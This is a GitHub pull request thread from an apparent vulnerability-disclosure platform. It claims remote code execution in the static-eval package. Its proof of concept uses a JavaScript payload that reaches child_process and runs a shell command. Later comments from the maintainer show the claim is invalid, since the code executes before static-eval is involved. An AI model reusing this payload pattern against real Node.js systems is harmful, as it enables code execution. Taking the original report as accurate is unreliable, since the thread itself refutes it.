
Remote Code Execution (RCE) in static-eval #1883

Merged
merged 2 commits into from
Feb 13, 2021

Conversation

gkmr507
Contributor

@gkmr507 gkmr507 commented Feb 13, 2021

✍️ Description

Remote Code Execution (RCE) in static-eval.

🕵️‍♂️ Proof of Concept

  1. Create the following PoC file:
// poc.js
var evaluate = require('static-eval');
var parse = require('esprima').parse;

var src=(function (x) { return `${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")}` })()
var ast = parse(src).body[0].expression;
evaluate(ast)
  2. Execute the following commands in terminal:
npm i static-eval # Install affected module
node poc.js # Run the PoC
  3. Check the output using the ls command before and after the execution.

💥 Impact

It may lead to Information Disclosure/DoS/RCE.

✅ Checklist

In my pull request, I have:

  • Created and populated the README.md and vulnerability.json files
  • Provided the repository URL and any applicable permalinks
  • Defined all the applicable weaknesses (CWEs)
  • Proposed the CVSS vector items i.e. User Interaction, Attack Complexity
  • Checked that the vulnerability affects the latest version of the package released
  • Checked that a fix does not currently exist that remediates this vulnerability
  • Complied with all applicable laws

@github-actions github-actions bot added automerge disclosure Vulnerability disclosure labels Feb 13, 2021
@JamieSlome JamieSlome merged commit 9281a2c into 418sec:staging Feb 13, 2021
@d3m0n-r00t
Contributor

Hi @hethvik,
I was trying to fix this bug, and that's when I saw that the PoC actually does not show any bug in static-eval. The injection happens even before it is passed to the static-eval module. I am not sure about the vulnerability you explained, but I think the PoC is not valid here.
[Screenshot: 2021-02-17 134725]
As you can see in the screenshot the ls gets executed even before it is passed to the evaluate or even parse in this case.
Please do comment if I am wrong. But I think this is not a vulnerability of static-eval.
@JamieSlome please share your view too.

@JamieSlome
Contributor

@goto-bus-stop - would be great to get your thoughts here.

Cheers! 🍰

@goto-bus-stop

goto-bus-stop commented Feb 17, 2021

Yes, the POC just straight up executes code regardless of static-eval.

Even if this did involve static-eval, we mention in the documentation that cases like this are basically expected and that static-eval should only be used with trusted input: https://github.com/browserify/static-eval#security

Hence I would consider a problem like this to be a security problem in the application, not in static-eval.

@JamieSlome
Contributor

JamieSlome commented Feb 17, 2021

@goto-bus-stop - awesome, thanks for the heads up! 🍰

I will invalidate the bounty from the platform now...
